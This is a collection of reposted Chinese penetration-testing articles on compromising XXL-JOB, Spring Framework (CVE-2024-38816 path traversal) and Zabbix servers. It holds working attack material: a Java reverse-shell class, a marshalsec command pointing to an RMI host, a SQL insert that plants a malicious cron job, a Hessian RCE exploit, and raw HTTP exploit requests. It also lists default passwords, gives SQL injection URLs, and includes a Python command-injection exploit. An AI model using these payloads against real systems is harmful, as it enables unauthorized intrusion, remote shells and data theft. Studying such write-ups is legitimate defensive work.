XXL-JOB在真实攻防下的总结

本文转自 Air 并作补充

最近在HW中经常会遇到XXL-JOB这个组件，也通过这个组件进入了不少目标单位，那就对该组件的利用进行一次总结。

一、最基本的操作-计划任务命令执行

这个操作我相信大家已经熟的不能再熟了，因为xxl-job的初始化sql语句中设定了默认密码，而且在登入之后不会提示修改默认密码，就造成了xxl-job的默认账号密码为admin/123456。

由于xxl-job本身是任务调度的系统，其可以自然执行命令。通常会反弹shell，再进行后渗透，只需要在新建命令时选择对应的脚本语言，在GLUE IDE中编辑命令，选择执行一次即可。

这种方式有几个容易踩坑的点：

1、选择执行命令的种类与系统不匹配

因为xxl-job的exector在生产环境中常常跑在docker环境下的linux下，就会造成一个惯性思维:当我们拿到一个xxl-job的往往会先使用shell去执行命令。

当失败的时候就会以为是环境有问题，打不动。

却不知有时xxl-job也可以跑在Windows下。这时候就可以去执行Powerhshell命令去上线。当然如果比较懒的话可以直接执行java代码来上线。无论Windows和linux都可以反弹shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89

package com.xxl.job.service.handler;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.net.Socket;

public class reverse {
    class StreamConnector
    extends Thread
    {
        InputStream hx;
        OutputStream il;

        StreamConnector(InputStream hx, OutputStream il)
        {
            this.hx = hx;
            this.il = il;
        }

        public void run()
        {
            BufferedReader ar = null;
            BufferedWriter slm = null;
            try
                {
                    ar = new BufferedReader(new InputStreamReader(this.hx));
                    slm = new BufferedWriter(new OutputStreamWriter(this.il));
                    char[] buffer = new char[8192];
                    int length;
                    while ((length = ar.read(buffer, 0, buffer.length)) > 0)
                    {
                        slm.write(buffer, 0, length);
                        slm.flush();
                    }
                }
            catch (Exception localException) {}
            try
                {
                    if (ar != null) {
                        ar.close();
                    }
                    if (slm != null) {
                        slm.close();
                    }
                }
            catch (Exception localException1) {}
        }
    }
    public reverse()
    {
        reverseConn("ip:port");
    }

    public static void main(String[] args) 
    {
        System.out.println("0");
    }

    public void reverseConn(String ip)
    {
        String ipport = ip;
        try
            {
                String ShellPath;
                if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
                    ShellPath = new String("/bin/sh");
                } else {
                    ShellPath = new String("cmd.exe");
                }
                Socket socket = new Socket(ipport.split(":")[0], 
                                           Integer.parseInt(ipport.split(":")[1]));
                Process process = Runtime.getRuntime().exec(ShellPath);
                new StreamConnector(process.getInputStream(), 
                                    socket.getOutputStream()).start();
                new StreamConnector(process.getErrorStream(), 
                                    socket.getOutputStream()).start();
                new StreamConnector(socket.getInputStream(), 
                                    process.getOutputStream()).start();
            }
        catch (Exception e)
            {
                e.printStackTrace();
            }
    }
}

2、反弹shell

在实战中会碰到executor不出网的情况。即执行了反弹shell的命令之后在vps上未收到回显，这时就要去思考executor是否出网或者是注册executor是否失效。
我们可以去执行器中查看其注册方式

我们去正常来说自动注册的executor是不会出问题的。因为从代码实现来看xxl-job的executor每隔2min就会向adminer发送心跳证明其存活。而自己注册的可能就不一定可以打通。

二、api未授权访问

在xxl-job<=2.0.2的时候api存在未授权访问，有两种方式可以getshell。

1、利用jndi注入去打内存马

这个已经被人讲过好多次了，但是利用的前提就是需要出网，使用marshalsec去生成payload

1

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi://x.x.x.x:1099/aaa > test.ser

再利用curl去发包即可，注意尽量使用linux或者Windows的cmd去发包，实测Windows下powershell发包可能会出现一些问题。

1

curl -XPOST -H "Content-Type: x-application/hessian" --data-binary @test.ser http://127.0.0.1:8080/xxl-job-admin/api

2、去利用XSLT去注入内存马

这个应该是最好使的方案，Nookipop已经讲过了，在不出网时可以利用XSLT去打入内存马，进行命令执行，打入suo5内存马进行正向代理内网穿透。

详见 记一次曲折的XXL-JOB API Hessian反序列化到Getshell

三、执行命令注入内存马

这种同样是不出网时才考虑的操作。注入的是agent内存马，这个利用的条件其实也有点苛刻，一般来说xxl-job的executor常常跑在docker环境下或者分布式部署。而要想注入agent类型的内存马就需要admin端和executor跑在一台主机下。方法就是使用echo方法或者java的写入文件的方法将agent内存马写到目标主机上，然后在进行加载。具体利用方法可参照。XXL-JOB 深度利用

四、奇技淫巧-从数据库getShell

这也是实战中遇到的一个案例，目标单位存在一个nacos的身份伪造漏洞，获取到了数据库的配置文件，成功的连上了数据库，当然我们可以去尝试udf提权或者猜目录去写马，但我发现数据库中存在xxl_job的数据库，这时候其实就有更多的方法去getshell。

这时候通常有两种利用方式:1、获取到xxl-job的密码，登入xxl-job去写计划任务进行命令执行getshell。2、直接通过往数据库里写内容进行getshell。

1、登入xxl-job进行getshell

这种方式通常适用于xxl-job-admin的服务暴露在互联网上。我们可以通过语句select * from information_schema.PROCESSLIST;来判断客户端连接。由于我是在本地跑的环境，这里就是localhost，如果是通过公网ip去连接的数据库，我们就可以定位到其公网ip，扫一下端口即可判断xxl-job-admin是否暴露在公网上了。

如果暴露在公网上，我们便可以直接利用，xxl-job密码为md5加密，我们首先可以尝试md5解密，解不开的话新增一个用户，密码用md5加密即可。登入成功之后我们便可以通过计划任务进行命令执行了。

2、通过向数据库中写入数据进行getshell

这是我偶然发现的一个小trick，其实原理很简单，xxl-job-admin会定时从数据库中查询待执行的任务，在一定时间内执行。也就是说，我们只需要往数据库里插入我们构造好的恶意定时任务。他便会让executor去执行。当前测试版本为2.4.1（不同版本的xxl-job的数据库结构不太相同，以最新版的为例，旧版的在之前遇到的环境中经测试也能打通。）

只需要在xxl_job.xxl_job_info中插入这条语句即可

1
2
3

INSERT INTO `xxl_job`.`xxl_job_info` 
(`id`, `job_group`, `job_desc`, `add_time`, `update_time`, `author`, `alarm_email`, `schedule_type`, `schedule_conf`, `misfire_strategy`, `executor_route_strategy`, `executor_handler`, `executor_param`, `executor_block_strategy`, `executor_timeout`, `executor_fail_retry_count`, `glue_type`, `glue_source`, `glue_remark`, `glue_updatetime`, `child_jobid`, `trigger_status`, `trigger_last_time`, `trigger_next_time`) 
VALUES (7, 1, '22222', '2023-12-27 14:57:36', '2023-12-27 14:58:23', '22222', '', 'CRON', '0/5 * * * * ?', 'DO_NOTHING', 'FIRST', '', '', 'SERIAL_EXECUTION', 0, 0, 'GLUE_POWERSHELL', 'calc\n', '12312321', '2023-12-27 14:57:48', '', 0, 1703660320000, 1703660325000);

其中有几个值得关注的点：

schedule_type为corn轮询，0/5 * * * * ?则是计划任务执行的时间我这里设定为5秒1次。executor_handler则是执行命令的类型，我这里因为在Windows下测试，故而选择为powershell，也可变为GLUE_SHELL或者GLUE_GROOVY等来应对不同的命令。目前我们只是插入了命令，并不能执行，要是想执行，还需要在插入数据之后把trigger_status的值改为1，executor便会自动开始执行我们输入的命令。

五、executor未授权访问

xxl-job的executeor存在未授权访问漏洞，指纹如下图所示

低版本

高版本

其原因就是admin端与executeor端通过互相发送tcp包进行通信，攻击者可伪造包，使executeor执行命令。

该漏洞主要分为三个阶段

1、XxlJob<2.1.2，需要利用Hessian触发

参考这个项目即可RCE
https://github.com/OneSourceCat/XxlJob-Hessian-RCE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97

package com.example;

import com.xxl.job.core.biz.model.TriggerParam;
import com.xxl.rpc.remoting.net.params.XxlRpcRequest;

import com.xxl.rpc.serialize.impl.HessianSerializer;
import org.asynchttpclient.AsyncCompletionHandler;
import org.asynchttpclient.AsyncHttpClient;
import org.asynchttpclient.DefaultAsyncHttpClient;
import org.asynchttpclient.Response;

import java.io.IOException;
import java.util.Date;

public class App {

    private static void sendData(String url, byte[] bytes) {
        AsyncHttpClient c = new DefaultAsyncHttpClient();

        try{
            c.preparePost(url)
            .setBody(bytes)
            .execute(new AsyncCompletionHandler<Response>() {
                @Override
                public Response onCompleted(Response response) throws Exception {
                    System.out.println("Server Return Data: ");
                    System.out.println(response.getResponseBody());
                    return response;
                }

                @Override
                public void onThrowable(Throwable t) {
                    System.out.println("HTTP出现异常");
                    t.printStackTrace();
                    super.onThrowable(t);
                }
            }).toCompletableFuture().join();

            c.close();
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                c.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }


    }

    public static void main( String[] args ) throws Exception {

        String code = "package com.xxl.job.service.handler;\n" +
                "\n" +
                "import com.xxl.job.core.log.XxlJobLogger;\n" +
                "import com.xxl.job.core.biz.model.ReturnT;\n" +
                "import com.xxl.job.core.handler.IJobHandler;\n" +
                "import java.lang.Runtime;\n" +
                "\n" +
                "public class DemoGlueJobHandler extends IJobHandler {\n" +
                "\n" +
                "\t@Override\n" +
                "\tpublic ReturnT<String> execute(String param) throws Exception {\n" +
                "      \tRuntime.getRuntime().exec(\"calc\");\n" +
                "\t\treturn ReturnT.SUCCESS;\n" +
                "\t}\n" +
                "\n" +
                "}\n";

        System.out.println(code);

        TriggerParam params = new TriggerParam();
        params.setJobId(10);
        params.setExecutorBlockStrategy("SERIAL_EXECUTION");
        params.setLogId(10);
        params.setLogDateTime((new Date()).getTime());
        params.setGlueType("GLUE_GROOVY");
        params.setGlueSource(code);
        params.setGlueUpdatetime((new Date()).getTime());

        XxlRpcRequest xxlRpcRequest = new XxlRpcRequest();
        xxlRpcRequest.setRequestId("111");
        xxlRpcRequest.setClassName("com.xxl.job.core.biz.ExecutorBiz");
        xxlRpcRequest.setMethodName("run");
        xxlRpcRequest.setParameterTypes(new Class[]{TriggerParam.class});
        xxlRpcRequest.setParameters(new Object[] {params});
        xxlRpcRequest.setCreateMillisTime((new Date()).getTime());

        HessianSerializer serializer = new HessianSerializer();

        byte[] data = serializer.serialize(xxlRpcRequest);
        sendData("http://127.0.0.1:9999", data);

    }
}

2、2.2.0<=XxlJob<=2.4.0

支持了RESTFUL API，可以直接发送http包伪造
exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

POST /run HTTP/1.1
Host: 192.168.226.1:10999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
XXL-JOB-ACCESS-TOKEN: default_token
Content-Type: application/json
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_POWERSHELL",
  "glueSource": "calc",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

3、XxlJob >= 2.4.0添加了默认token

作者为了修复该漏洞，添加了默认的token，但是这就如同nacos的jwt秘钥，shiro的默认key一样，由于使用者的粗心大意不修改该key，还是可以被利用
exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

POST /run HTTP/1.1
Host: 192.168.226.1:10999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
XXL-JOB-ACCESS-TOKEN: default_token
Content-Type: application/json
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_POWERSHELL",
  "glueSource": "calc",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

CVE-2024-38816 Spring Framework 目录遍历漏洞详细分析

本文转自 真爱和自由 并作补充

漏洞描述

https://spring.io/security/cve-2024-38816

通过功能性 Web 框架 WebMvc.fn 或 WebFlux.fn 提供静态资源的应用程序容易受到路径遍历攻击。攻击者可以编写恶意 HTTP 请求并获取文件系统上任何可由 Spring 应用程序正在运行的进程访问的文件。

具体来说，当以下两个条件都成立时，应用程序就容易受到攻击：

• Web 应用程序用于RouterFunctions提供静态资源
• 资源处理明确配置了FileSystemResource位置

但是，当以下任何一项满足时，恶意请求都会被阻止和拒绝：

• Spring Security HTTP 防火墙正在使用中
• 应用程序在 Tomcat 或 Jetty 上运行

受影响的 Spring 产品和版本

Spring 框架

• 5.3.0 - 5.3.39
• 6.0.0 - 6.0.23
• 6.1.0 - 6.1.12
• 较旧的、不受支持的版本也受到影响

基础知识

首先分析一个cve说实话我是不太了解spring框架的，这时候就需要疯狂拷打GPT了

WebMvc.fn和WebFlux.fn

WebMvc

WebMvc 是 Spring Framework 提供的传统的 MVC（Model-View-Controller）架构，用于构建 web 应用程序。它使用的是 Servlet API，适合于构建基于线程的同步 web 应用。其基本组成包括：

• Controller：处理 HTTP 请求的主要组件。
• View：用于渲染响应的模板（如 JSP、Thymeleaf 等）。
• Model：包含应用程序的核心数据。

WebFlux

WebFlux 是 Spring 5 中引入的模块，专门用于构建异步、非阻塞的 web 应用，适合于高并发和 I/O 密集型的场景。WebFlux 基于反应式编程模型，允许应用在处理请求时不阻塞线程，从而提高了性能。

RouterFunctions 和 FileSystemResource

RouterFunctions

RouterFunctions 是Spring WebFlux的一部分，它提供了一种函数式编程模型来定义请求路由和处理。使用 RouterFunctions，你可以创建一个路由，它将HTTP请求映射到处理这些请求的函数上。

FileSystemResource

FileSystemResource 是Spring框架中的一个类，它表示文件系统中的一个资源，通常用于读取和写入文件。它实现了 org.springframework.core.io.Resource 接口。

环境搭建

这里就用webflux来举例子

首先选择spring的版本，只需要在影响版本里面的就好了

1 2 3 4

<dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-webflux</artifactId> </dependency>

然后因为要满足

当以下两个条件都成立时，应用程序就容易受到攻击：

• Web 应用程序用于RouterFunctions提供静态资源
• 资源处理明确配置了FileSystemResource位置

可以问问gpt啥的

创建一个漏洞代码

1 2 3 4 5 6 7

@Configuration public class Config { @Bean public RouterFunction<ServerResponse> test() { return RouterFunctions.resources("/static/**", new FileSystemResource("D:/phpstudy_pro/WWW/")); } }

漏洞复现

首先我们在D盘放一个文件，用于测试

在1.txt写入flag{scueess}

然后尝试访问路由

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

GET /static/%5c/%5c/../../1.txt HTTP/1.1 Host: 127.0.0.1:8888 sec-ch-ua: "Chromium";v="125", "Not.A/Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive

可以发现是成功了

漏洞分析

先查看官方的diff确定漏洞代码位置

https://github.com/spring-projects/spring-framework/commit/d86bf8b2056429edf5494456cffcb2b243331c49#diff-25869a3e3b3d4960cb59b02235d71d192fdc4e02ef81530dd6a660802d4f8707L151

是在PathResourceLookupFunction类，如何修复的先不关心，当然如果很明显就可以更快，我们把关键方法给打个断点慢慢看一看，然后慢慢分析调试一会就能知道个大概

因为是使用了RouterFunctions处理，会来到如下代码

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

public Mono<Resource> apply(ServerRequest request) { PathContainer pathContainer = request.requestPath().pathWithinApplication(); if (!this.pattern.matches(pathContainer)) { return Mono.empty(); } else { pathContainer = this.pattern.extractPathWithinPattern(pathContainer); String path = this.processPath(pathContainer.value()); if (path.contains("%")) { path = StringUtils.uriDecode(path, StandardCharsets.UTF_8); } if (StringUtils.hasLength(path) && !this.isInvalidPath(path)) { try { Resource resource = this.location.createRelative(path); return resource.isReadable() && this.isResourceUnderLocation(resource) ? Mono.just(resource) : Mono.empty(); } catch (IOException var5) { throw new UncheckedIOException(var5); } } else { return Mono.empty(); } } }

首先是从pathContainer.value()获取path，然后由processPath处理

processPath方法如下

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

private String processPath(String path) { boolean slash = false; for(int i = 0; i < path.length(); ++i) { if (path.charAt(i) == '/') { slash = true; } else if (path.charAt(i) > ' ' && path.charAt(i) != 127) { if (i == 0 || i == 1 && slash) { return path; } path = slash ? "/" + path.substring(i) : path.substring(i); return path; } } return slash ? "/" : ""; }

简单来讲就是

去除路径开头的无效字符：忽略空格、控制字符等无效字符，找到第一个有效字符。

保留根路径：如果路径开头有斜杠 /，则确保处理后的路径以 / 开头。

快速返回有效路径：如果路径是根路径或有效路径已经以 / 开头，直接返回，不做额外处理。

输入: " /home/user"
输出: "/home/user"

• 去除了路径开头的空格，保留以 / 开头的有效路径。

输入: " user/docs"
输出: "user/docs"

• 去除了路径开头的空格，保留从第一个有效字符 u 开始的路径。

输入: "////"
输出: "/"

• 只有斜杠的情况，返回根路径 /。

输入: " "
输出: ""

这个处理对我们的../这种没有影响的

然后回到apply

1 2 3

if (path.contains("%")) { path = StringUtils.uriDecode(path, StandardCharsets.UTF_8); }

如果包含%，就是url编码的标志，然后会继续url解码

最终确定路径的点是在

1 2 3 4

if (StringUtils.hasLength(path) && !this.isInvalidPath(path)) { try { Resource resource = this.location.createRelative(path); return resource.isReadable() && this.isResourceUnderLocation(resource) ? Mono.just(resource) : Mono.empty();

关键在于this.isInvalidPath(path)判断

1 2 3 4 5 6 7 8 9 10 11 12 13 14

private boolean isInvalidPath(String path) { if (!path.contains("WEB-INF") && !path.contains("META-INF")) { if (path.contains(":/")) { String relativePath = path.charAt(0) == '/' ? path.substring(1) : path; if (ResourceUtils.isUrl(relativePath) || relativePath.startsWith("url:")) { return true; } } return path.contains("..") && StringUtils.cleanPath(path).contains("../"); } else { return true; } }

我们需要的是返回false，看来能够返回的只有一个地方了return path.contains(“..”) && StringUtils.cleanPath(path).contains(“../“);，首先我们可以有..这种字符的存在，因为是&符号连接的，所以终极目的就是StringUtils.cleanPath(path).contains(“../“)返回false

cleanPath方法很长，一步一步分析

这个代码是为了处理windows和linux的差异的，会windows中的\\或者\转为linux中的/

1 2 3 4 5 6 7

String normalizedPath; if (path.indexOf(92) != -1) { normalizedPath = replace(path, "\\\\", "/"); normalizedPath = replace(normalizedPath, "\\", "/"); } else { normalizedPath = path; }

然后就是处理前缀了,如果路径没有.直接返回，如果又会处理，还是为了处理windows的场景

58 对应的是冒号 :，用于检测是否有像 C: 这样的路径前缀。如果存在前缀（如 Windows 路径中的盘符），将其提取出来。

如果前缀中包含 /，则认为它不是有效的前缀（可能是 URL 的一部分），清除它；否则将前缀保留并将路径的主体部分截取出来。

1 2 3 4 5 6 7 8 9 10 11 12 13

if (normalizedPath.indexOf(46) == -1) { return normalizedPath; } else { int prefixIndex = normalizedPath.indexOf(58); String prefix = ""; if (prefixIndex != -1) { prefix = normalizedPath.substring(0, prefixIndex + 1); if (prefix.contains("/")) { prefix = ""; } else { pathToUse = normalizedPath.substring(prefixIndex + 1); } }

然后根据 / 拆分路径，将其转换为一个数组 pathArray

1 2 3

String[] pathArray = delimitedListToStringArray(pathToUse, "/"); Deque<String> pathElements = new ArrayDeque(pathArray.length); int tops = 0;

如果包含.则不会走到pathElements.addFirst(element);相当于去除，中间对于tops的处理就是相当于在处理..的路径穿越字符了

1 2 3 4 5 6 7 8 9 10 11 12

for(i = pathArray.length - 1; i >= 0; --i) { String element = pathArray[i]; if (!".".equals(element)) { if ("..".equals(element)) { ++tops; } else if (tops > 0) { --tops; } else { pathElements.addFirst(element); } } }

结合

1 2 3 4 5 6 7 8 9 10

if ("..".equals(element)) { ++tops; } else if (tops > 0) { --tops; } ...... for(i = 0; i < tops; ++i) { pathElements.addFirst(".."); }

处理前和处理后的代码

应该能读懂这个逻辑吧

然后最后就是拼接了

1 2	String joined = collectionToDelimitedString(pathElements, "/"); return prefix.isEmpty() ? joined : prefix + joined;

如果我们想要返回的路径不包含../就得从其中一步找点破绽，其实就是连猜带蒙多去尝试各种各样的路径

其实考虑一下，它是类似于这种就会实现有../但是返回的时候不包含../

比如

a/b/../c

经过处理后，路径将被简化为 a/b/d，因为 c/.. 相当于取消了 c 目录的影响

这里我们希望b能够占个位置，但是又不会当作目录的一个字符

代码逻辑是以/作为分割

空字符也算做一个元素，按理来说构造这样一个字符就ok了

1	/static/////../../1.txt

自己写一个测试类

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

package org.example.demo; import org.springframework.util.ResourceUtils; import org.springframework.util.StringUtils; public class test { public static void main(String[] args) { String path = "/static/////../../1.txt"; System.out.println(isInvalidPath(path)); } public static boolean isInvalidPath(String path) { if (!path.contains("WEB-INF") && !path.contains("META-INF")) { if (path.contains(":/")) { String relativePath = path.charAt(0) == '/' ? path.substring(1) : path; if (ResourceUtils.isUrl(relativePath) || relativePath.startsWith("url:")) { return true; } } return path.contains("..") && StringUtils.cleanPath(path).contains("../"); } else { return true; } } }

可以看到确实是可以的，但是实际中不行，是因为最开始分析的processPath对我们的路径最了标准化处理

然后思路就回到如何绕过这个标准化，就是不能出现////这种连起来的，再结合刚刚对windows的处理\

那我们可以构造这样一个路径

1	/static/%5c/%5c/../../1.txt

首先processPath处理后原样输出，而标准化处理后就变为

然后就可以了

参考

https://avd.aliyun.com/detail?id=AVD-2024-38816

Zabbix 漏洞深入利用

本文转自 Geekby 并作补充

1 前言

Zabbix 是一个基于 WEB 界面的提供分布式系统监视系统监视以及网络监视功能的企业级的开源解决方案，能监视各种网络参数，保证服务器系统服务器系统的安全运营；并提供灵活的通知机制以让系统管理员快速定位、解决存在的各种问题。

1.1 组件

Zabbix 监控系统由以下几个组件部分构成：

• Zabbix Server

Zabbix Server 是所有配置、统计和操作数据的中央存储中心，也是 Zabbix 监控系统的告警中心。在监控的系统中出现任何异常，将被发出通知给管理员。Zabbix Server 的功能可分解成为三个不同的组件，分别为 Zabbix Server 服务、Web 后台及数据库。

• Zabbix Proxy

Zabbix Proxy 是在大规模分布式监控场景中采用一种分担 Zabbix Server 压力的分层结构，其多用在跨机房、跨网络的环境中，Zabbix Proxy 可以代替 Zabbix Server 收集性能和可用性数据，然后把数据汇报给 Zabbix Server，并且在一定程度上分担了 Zabbix Server 的压力。

• Zabbix Agent

Zabbix Agent 部署在被监控的目标机器上，以主动监控本地资源和应用程序（硬盘、内存、处理器统计信息等）。Zabbix Agent 收集本地的状态信息并将数据上报给 Zabbix Server 用于进一步处理。

1.2 网络架构

对于 Zabbix Agent 客户端来说，根据请求类型可分为被动模式及主动模式：

• 被动模式：Server 向 Agent 的 10050 端口获取监控项数据，Agent 根据监控项收集本机数据并响应。
• 主动模式：Agent 主动请求 Server (Proxy) 的 10051 端口获取监控项列表，并根据监控项收集本机数据提交给 Server (Proxy)

1.3 Zabbix Agent 配置

Zabbix Agent 服务的配置文件为 zabbix_agentd.conf，Linux 默认路径在 /etc/zabbix/zabbix_agentd.conf。

配置文件中包含的一些基本设置选项：

• Server 参数

Server 或 Proxy 的 IP、CIDR、域名等，Agent 仅接受来自 Server 参数的 IP 请求（白名单）。

• ServerActive 参数

Server 或 Proxy 的 IP、CIDR、域名等，用于主动模式，Agent 主动向 ServerActive 参数的 IP 发送请求。

• StartAgents 参数

zabbix 启动之后开启被动监控的进程数量，默认为3。如果设置为 0，那么 zabbix 被动监控被禁用，并且不会监听 10050 端口。

配置文件中包含的一些可能存在风险的设置选项：

• Include 参数

加载配置文件目录单个文件或所有文件，通常包含的 conf 都是配置 UserParameter 自定义用户参数。

• UserParameter 参数

自定义用户参数，格式为UserParameter=<key>,<command>，Server 可向 Agent 执行预设的自定义参数命令以获取监控数据，以官方示例为例：

1	UserParameter=ping[*],echo $1

当 Server 向 Agent 执行 ping[aaaa] 指令时，$1 为传参的值，Agent 经过拼接之后执行的命令为echo aaaa，最终执行结果为aaaa。

command 存在命令拼接，但由于传参内容受 UnsafeUserParameters 参数限制，默认无法传参特殊符号，所以默认配置利用场景有限。

• UnsafeUserParameters 参数

自定义用户参数是否允许传参任意字符，默认不允许字符 \ ' " `` * ? [ ] { } ~ $ ! & ; ( ) < > | # @，当 UnsafeUserParameters=1 时，允许特殊字符。

以 UserParameter=ping[*],echo $1 为例，向 Agent 执行指令 ping[test && whoami]，经过命令拼接后最终执行 echo test && whoami，成功注入执行 shell 命令。

• EnableRemoteCommands 参数

是否允许来自 Zabbix Server 的远程命令，开启后可通过 Server 下发 shell 脚本在 Agent 上执行。当值为 1 时，允许远程下发命令。

• AllowRoot 参数

Linux 默认以低权限用户 zabbix 运行，开启后以 root 权限运行 zabbix_agentd 服务。当其值为 1 时，允许以 root 权限执行命令。

2 Zabbix 历史漏洞

2.1 弱口令

2.1.1 Web 端

Zabbix 安装后自带 Admin 管理员用户和 Guests 访客用户（低版本），可登陆 Zabbiax 后台。

常见弱口令组合：

• admin:zabbix
• Admin:zabbix
• guset:空口令

2.1.2 mysql 端

由于 root 用户默认情况下无法外连，运维通常会新建 MySQL 用户 zabbix，常见密码如下：

1 2 3 4 5 6

123456 zabbix zabbix123 zabbix1234 zabbix12345 zabbix123456

拿下 MySQL 数据库后，可解密 users 表的密码 md5 值，或者直接替换密码的 md5 为已知密码，即可登录 Zabbix Web。

2.2 CVE-2016-10134 - SQL 注入漏洞

该漏洞的具体分析可参考：zabbix SQL注入漏洞（CVE-2016-10134），原理是 insert 插入时未对用户输入的数据进行过滤，可以进行显错注入。

2.2.1 已有用户凭据

以 Guest 用户登录后，查看 Cookie 中的zbx_sessionid，复制后 16 位字符：

将这 16 个字符作为 sid 的值，访问 http://your-ip:8080/latest.php?output=ajax&sid=16位 ID&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)，可见成功注入：

2.2.2 无用户凭据

这个漏洞也可以通过 jsrpc.php 触发，且无需登录：http://IP:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)：

将用户密码 MD5 还原即可登录。漏洞利用脚本：zabbixPwn

2.3 CVE-2017-2824 - 命令注入

利用该漏洞，需要服务端开启了自动注册功能，所以我们先以管理员的身份开启自动注册功能。使用账号密码 admin/zabbix 登录后台，进入 Configuration->Actions，将 Event source 调整为 Auto registration，然后点击 Create action，创建一个 Action，名字随意：

第三个标签页，创建一个 Operation，type是 Add Host：

保存。这样就开启了自动注册功能，攻击者可以将自己的服务器注册为 Agent。

第一条数据：

active checks是 Agent 主动检查时用于获取监控项列表的命令，Zabbix Server 在开启自动注册的情况下，通过 active checks 命令请求获取一个不存在的 host 时，自动注册机制会将 json 请求中的 host、ip 添加到 interface 数据表里。

1	{"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))

第二条数据：

1	{"request":"command","scriptid":1,"hostid":10001}

command 指令可以在未授权的情况下可指定主机 (hostid) 执行指定脚本 (scriptid)，Zabbix 存在 3 个默认脚本，脚本中的 {HOST.CONN} 在脚本调用的时候会被替换成主机 IP。

1 2 3

# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1 # scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1 # scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1

scriptid 指定其中任意一个，hostid 为注入恶意 Payload 后的主机 id，但自动注册后的 hostid 是未知的，所以通过 command 指令遍历 hostid 的方式都执行一遍，最后成功触发命令注入漏洞。

由于默认脚本的类型限制，脚本都是在 Zabbix Server 上运行，Zabbix Proxy 是无法使用 command 指令的。payload 长度受限制可拆分多次执行，必须更换 host 名称以执行新的payload。

EXP 如下：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

import sys import socket import json import sys def send(ip, data): conn = socket.create_connection((ip, 10051), 10) conn.send(json.dumps(data).encode()) data = conn.recv(2048) conn.close() return data target = sys.argv[1] print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"})) for i in range(10000, 10500): data = send(target, {"request":"command","scriptid":1,"hostid":str(i)}) if data and b'failed' not in data: print('hostid: %d' % i) print(data)

2.4 CVE-2020-11800 - 命令注入

该漏洞为基于 CVE-2017-2824 的绕过利用。未授权攻击者向 Zabbix Server 的 10051 端口发送 trapper 功能相关命令，利用漏洞即可在 Zabbix Server 上执行系统命令。

其中 CVE-2020-11800 漏洞通过 ipv6 格式绕过 ip 字段检测注入执行 shell 命令，受数据表字段限制 Payload 长度只能为 64 个字符。

1	{"request":"active checks","host":"vulhub","ip":"ffff:::;whoami"}

由于 CVE-2017-2824 与 CVE-2020-11800 漏洞点及利用区别不大，不再复述。

3 Zabbix 后渗透测试

